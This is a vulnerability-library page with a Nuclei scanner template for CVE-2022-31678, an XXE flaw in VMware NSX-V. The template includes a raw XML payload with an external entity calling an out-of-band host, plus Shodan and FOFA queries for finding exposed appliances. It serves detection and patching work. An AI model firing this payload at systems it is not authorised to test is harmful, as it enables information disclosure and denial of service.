/Vulnerability Library

VMWare Cloud Foundation NSX-V - XML External Entity (XXE)

CVE-2022-31678
Verified

Description

VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure.

Severity

Critical

CVSS Score

9.1

Exploit Probability

84%

Affected Product

cloud_foundation

Published Date

January 22, 2026

Template Author

daffainfo

CVE-2022-31678.yaml
id: CVE-2022-31678

info:
  name: VMWare Cloud Foundation NSX-V - XML External Entity (XXE)
  author: daffainfo
  severity: critical
  description: |
    VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure.
  impact: |
    Attackers can cause denial-of-service or access sensitive information by exploiting XXE vulnerability.
  remediation: |
    Update to the latest version of VMware Cloud Foundation with patched NSX-V component.
  reference:
    - https://srcincite.io/advisories/src-2022-0022/
    - https://www.vmware.com/security/advisories/VMSA-2022-0027.html
    - https://nvd.nist.gov/vuln/detail/cve-2022-31678
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2022-31678
    cwe-id: CWE-611
    epss-score: 0.83926
    epss-percentile: 0.9931
    cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vmware
    product: cloud_foundation
    shodan-query: title:"VMware Appliance Management"
    fofa-query: title="VMware Appliance Management"
  tags: cve,cve2022,vmware,nsx,xxe,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/login.jsp"

    matchers:
      - type: word
        part: body
        words:
          - "<title>VMware Appliance Management"
        internal: true

  - raw:
      - |
        POST /api/3.0/services/auth/token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?>
        <!DOCTYPE r [
          <!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
        ]>
        <request>
          <username>&xxe;</username>
          <password>{{randstr}}</password>
        </request>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"

      - type: word
        part: body
        words:
          - "Bad Username or Credentials presented"

      - type: status
        status:
          - 403
# digest: 4a0a0047304502201a7dc82c52890849751424649c410e8819fea520b53c26db767a47793c3f0ec0022100dd2cc48fa5858b1a94a0002c0930e943878021d2dbd01b534eaaab9d985d5a7a:922c64590222798bb761d5b6d8e72950
9.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
CVE ID:
cve-2022-31678
CWE ID:
cwe-611

References

https://srcincite.io/advisories/src-2022-0022/https://www.vmware.com/security/advisories/VMSA-2022-0027.htmlhttps://nvd.nist.gov/vuln/detail/cve-2022-31678

Remediation Steps

Update to the latest version of VMware Cloud Foundation with patched NSX-V component.